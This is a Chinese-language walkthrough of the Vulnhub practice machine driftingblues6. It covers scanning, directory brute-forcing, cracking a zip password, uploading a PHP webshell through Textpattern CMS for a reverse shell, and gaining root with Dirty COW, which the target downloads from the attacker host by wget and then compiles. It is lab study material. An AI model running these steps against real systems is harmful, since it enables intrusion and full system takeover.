Vulnhub靶机:driftingblues 6

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:driftingblues6(10.0.2.22)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-6,672/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.22

使用nmap端口扫描发现靶机开放端口:80

打开网站没有发现可以利用的功能点,查看源码未发现隐藏数据

使用dirsearch工具爆破目录

dirsearch -u http://10.0.2.22/ 
dirsearch -u http://10.0.2.22/textpattern/ 
dirsearch -u http://10.0.2.22/textpattern/textpattern/

访问/robots.txt

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

访问/textpattern/README可以看到该网站为Textpattern CMS版本为4.8.3

根据提示使用dirbuster工具进行目录爆破,爆破.zip


获取爆破得到的zip文件,解压,发现需要输入密码

使用fcrackzip工具进行暴力破解,得到密码:myspace4

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u spammer.zip 

将压缩文件解压,得到用户名密码:mayer:lionheart

尝试登录网站,登录成功


三、漏洞利用

登录网站,查看网站各个功能点,发现存在文件上传功能,直接上传php webshell,上传成功

查看之前爆破的目录,有一个/textpattern/files/上传的webshell就放在在里面

直接访问webshell,反弹shell成功

四、提权

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

查看靶机系统内核版本uname -a,发现版本为:Linux 3.2.0-4

并且发现该靶机存在gcc环境which gcc

可以使用脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

在主机开启web服务,并在靶机下载提权脚本

攻击机:
service apache2 start     

靶机:
wget http://10.0.2.15/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty

创建一个具有root权限的用户firefart,密码为你自己设置的密码:firefart\root

切换为firefart用户

获取flag,只发现了一个flag

相关推荐
007php0074 小时前
linux服务器上CentOS的yum和Ubuntu包管理工具apt区别与使用实战
linux·运维·服务器·ubuntu·centos·php·ai编程
djykkkkkk4 小时前
ubuntu编译遇到的问题
linux·运维·ubuntu
qq_429856575 小时前
linux 查看服务是否开机自启动
linux·运维·服务器
7yewh6 小时前
Linux驱动开发 IIC I2C驱动 编写APP访问EEPROM AT24C02
linux·arm开发·驱动开发·嵌入式硬件·嵌入式
dessler6 小时前
Docker-Dockerfile讲解(三)
linux·运维·docker
KevinRay_7 小时前
命令行之巅:Linux Shell编程的至高艺术(中)
linux·运维·服务器·重定向·shell编程
黑客Ela7 小时前
【网络安全设备系列】7、流量监控设备
安全·web安全
程序员JerrySUN7 小时前
Yocto 项目 - 共享状态缓存 (Shared State Cache) 机制
linux·嵌入式硬件·物联网·缓存·系统架构
网络安全指导员8 小时前
网络安全 - DOS
web安全·哈希算法·散列表
林农8 小时前
C05S16-MySQL高可用
linux·mysql·云计算